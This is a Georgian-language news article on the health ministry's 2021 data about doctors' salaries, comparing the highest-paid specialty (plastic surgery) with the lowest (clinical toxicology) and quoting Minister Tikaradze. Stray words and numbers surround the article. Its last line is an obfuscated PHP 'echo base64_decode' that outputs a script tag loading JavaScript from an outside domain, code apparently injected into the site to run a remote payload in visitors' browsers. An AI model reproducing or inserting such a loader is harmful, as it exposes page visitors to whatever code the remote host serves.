celsiusi
ავერსი საქკაბელი
ჯანდაცვის სამინისტროს მონაცემებით, საქართველოში მომუშავე ექიმებს შორის, ყველაზე მაღალი ანაზღაურება პლასტიკურ და რეკონსტრუქციულ ქირურგიაში დასაქმებულებს აქვთ, ყველაზე დაბალი — კლინიკურ ტოქსიკოლოგიაში დასაქმებულებს.
 
2021 წლის 7 ივლისს ჯანდაცვის მინისტრმა ეკატერინე ტიკარაძემ სამინისტროს 10-წლიანი გეგმის პრეზენტაცია გამართა, რომლის ფარგლებშიც მიმოიხილა ექიმების ანაზღაურება და ამ სფეროში დასაქმებულებს შორის უთანასწორობაზე ისაუბრა.
 
სამინისტროს პრეზენტაციაში მითითებული მონაცემების თანახმად, ყველაზე მაღალანაზღაურებადი ექიმი პლასტიკური და რეკონსტრუქციის ქირურგიაშია დასაქმებული და ყოველთვიურად იღებს 46 505 ლარს. ამ დარგში ყველაზე დაბალი ხელფასი 527 ლარია, საშუალო ხელფასი კი 10 642 ლარს შეადგენს.
 
სამინისტროს ექიმების 8 ქვეკატეგორია აქვს გამოყოფილი, რომელთა შორის ყველაზე დაბალანაზღაურებადია კლინიკური ტოქსიკოლოგია, სადაც საშუალო ხელფასი 2 934 ლარია; მინიმალური ხელფასი 389 ლარია, მაქსიმალური კი 13 993.
 
პრეზენტაციაზე მინისტრმა ეკატერინე ტიკარაძემ განაცხადა, რომ „ექიმების სახელფასო არეალის გაანალიზების შემდეგ აღმოჩნდა, რომ არსებობს ძალიან დიდი დისბალანსი, არამხოლოდ სხვადასხვა პროფილის, არამედ ერთი პროფილის ექიმებშიც“.
 
ეს არ არის პირველი შემთხვევა, როდესაც მინისტრი ტიკარაძე ექიმების ხელფასების უთანასწორობაზე საუბრობს. 28 აპრილს მან განაცხდა, რომ საქართველოში ექიმების არ არის „სიმეტრიული“ და ზოგიერთი ექიმის თვიური შემოსავალი 300 ლარს შეადგენს, ზოგიერთის თვიური შემოსავალი კი 120 000 ლარია, რაც, მისი თქმით, უსამართლოა.
 
სამინისტროს გამოქვეყნებულ მონაცემებში მაქსიმალურ შემოსავლად 46 505 ლარია დასახელებული და არა 120 000.
1702
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");